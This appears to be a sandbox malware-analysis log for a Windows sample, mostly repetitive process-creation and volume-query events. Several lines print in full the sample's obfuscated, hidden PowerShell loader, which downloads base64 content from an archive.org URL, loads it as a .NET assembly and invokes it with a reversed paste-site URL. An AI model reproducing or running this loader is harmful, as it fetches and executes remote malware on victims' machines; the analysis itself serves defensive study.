[obje'+'ct['+']]'+'@({1}'+'0'+'/gj1k'+'s'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}c'+'a'+'spo'+'l{1}'+',{1'+'}{'+'1}))')-f [char]36,[char]39) |iex"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/detah'+'notev'+'.txt{1};{0'+'}base64co'+'ntent '+'='+' '+'(new-ob'+'ject sy'+'st'+'em.ne'+'t.w'+'ebclie'+'nt).'+'downl'+'oadst'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'ycon'+'ten'+'t ='+' '+'[system.convert]'+'::'+'fromba'+'se64string({0}base'+'64con'+'tent);{0}asse'+'mbl'+'y '+'='+' [reflection.as'+'s'+'embly]::'+'lo'+'ad({0}bina'+'rycontent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.gett'+'yp'+'e({1}r'+'unpe'+'.ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.getmethod({1}va'+'i{1}'+');{0}'+'m'+'e'+'th'+'od.in'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gj1k'+'s'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}c'+'a'+'spo'+'l{1}'+',{1'+'}{'+'1}))')-f [char]36,[char]39) |iex"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/detah'+'notev'+'.txt{1};{0'+'}base64co'+'ntent '+'='+' '+'(new-ob'+'ject sy'+'st'+'em.ne'+'t.w'+'ebclie'+'nt).'+'downl'+'oadst'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'ycon'+'ten'+'t ='+' '+'[system.convert]'+'::'+'fromba'+'se64string({0}base'+'64con'+'tent);{0}asse'+'mbl'+'y '+'='+' [reflection.as'+'s'+'embly]::'+'lo'+'ad({0}bina'+'rycontent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.gett'+'yp'+'e({1}r'+'unpe'+'.ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.getmethod({1}va'+'i{1}'+');{0}'+'m'+'e'+'th'+'od.in'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gj1k'+'s'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}c'+'a'+'spo'+'l{1}'+',{1'+'}{'+'1}))')-f [char]36,[char]39) |iex"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/detah'+'notev'+'.txt{1};{0'+'}base64co'+'ntent '+'='+' '+'(new-ob'+'ject sy'+'st'+'em.ne'+'t.w'+'ebclie'+'nt).'+'downl'+'oadst'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'ycon'+'ten'+'t ='+' '+'[system.convert]'+'::'+'fromba'+'se64string({0}base'+'64con'+'tent);{0}asse'+'mbl'+'y '+'='+' [reflection.as'+'s'+'embly]::'+'lo'+'ad({0}bina'+'rycontent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.gett'+'yp'+'e({1}r'+'unpe'+'.ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.getmethod({1}va'+'i{1}'+');{0}'+'m'+'e'+'th'+'od.in'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gj1k'+'s'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}c'+'a'+'spo'+'l{1}'+',{1'+'}{'+'1}))')-f [char]36,[char]39) |iex"
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Queries volume information: C:\Users\Public\Documents\sys VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Queries volume information: C:\Users\Public\Documents\sys VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Queries volume information: C:\Users\Public\Documents\pow VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Queries volume information: C:\Users\Public\Documents\pow VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Queries volume information: C:\Users\Public\Documents\32 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Queries volume information: C:\Users\Public\Documents\32 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
